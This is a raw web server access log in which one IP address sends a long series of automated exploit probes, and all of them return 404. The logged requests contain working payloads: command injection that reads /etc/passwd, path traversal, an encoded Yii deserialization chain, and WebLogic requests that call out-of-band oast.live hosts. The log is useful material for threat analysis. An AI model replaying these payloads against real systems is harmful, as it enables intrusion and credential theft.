137.220.197.141 - - [21/Jan/2024:16:36:19 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:36:20 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:36:20 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:36:23 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:36:44 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:37:13 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:37:26 +0100] "GET /api/experimental/latest_runs HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:38:28 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:38:42 +0100] "POST /pandora_console/ajax.php?page=include/ajax/events&perform_event_response=10000000&target=cat+/etc/passwd&response_id=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:38:49 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:38:51 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:38:51 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:38:53 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:39:59 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:40:01 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:40:03 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:40:18 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:40:23 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:40:36 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:40:42 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:40:48 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:41:01 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:41:35 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:08 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:26 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:28 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:31 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:35 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:44 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:49 +0100] "POST /context.json HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:42:57 +0100] "GET /?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:44:44 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsog18pipynz314sa.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:44:48 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:45:29 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:45:31 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:45:47 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:46:13 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:46:28 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsog7cjpqxwm1yuu6.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:46:40 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsog3aidzywgrptyn.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:46:53 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsog5txqscmsizxau.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:47:34 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:47:47 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:48:31 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:48:33 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:48:35 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:48:39 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:48:41 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:01 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:03 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:10 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:12 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:14 +0100] "POST /module/ HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:28 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:28 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:30 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:41 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:49:55 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:50:28 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:50:38 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsogrwr8dwfzftdxd.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:50:46 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:50:46 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:51:25 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:51:27 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:51:29 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:51:36 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsog8hp1o9f73c18e.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:52:02 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsogknh8aee5qkx8g.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:53:08 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:53:23 +0100] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:53:39 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:54:36 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:55:02 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:55:44 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:56:07 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:56:09 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:56:32 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:56:35 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsoge9irjjs3uo7k8.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:11 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:22 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:26 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:28 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:30 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:34 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:53 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:57:55 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:05 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:07 +0100] "GET /login.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:09 +0100] "POST /lib/crud/userprocess.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:17 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:29 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:42 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:42 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:16:58:45 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:45 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:58:54 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsogzo1oymm9s9e65.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:59:08 +0100] "GET /console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cmm00rc3m87t5g88qsog4tz55qb5qk4gd.oast.live') HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:59:29 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:16:59:58 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:00:34 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:01:21 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:01:37 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:01:44 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:01:44 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:01:49 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:01:58 +0100] "POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:02:02 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:02:21 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:03:16 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:03:24 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:03:26 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:03:42 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:05:30 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:05:37 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:31 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:33 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:33 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:49 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:52 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:53 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:53 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:55 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:06:59 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:07:19 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:07:19 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:07:21 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:07:31 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:07:44 +0100] "GET /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:08:11 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:08:51 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:09:00 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:09:06 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:09:11 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:09:24 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:09:24 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:10:28 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:10:44 +0100] "GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:11:12 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:11:14 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:11:25 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:11:40 +0100] "GET /analytics/saw.dll?bieehome&startPage=1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:11:42 +0100] "GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:13:07 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:13:40 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:13:48 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:13:55 +0100] "POST /mifs/.;/services/LogService HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:14:01 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:14:03 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:14:06 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:14:33 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:15:00 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:15:33 +0100] "GET /user/login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:15:46 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:15:48 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:16:36 +0100] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Etjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:16:38 +0100] "GET /include/tjnz.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:18:01 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:19:01 +0100] "POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:19:27 +0100] "POST /run HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:17:19:38 +0100] "POST /run HTTP/1.1" 404 952
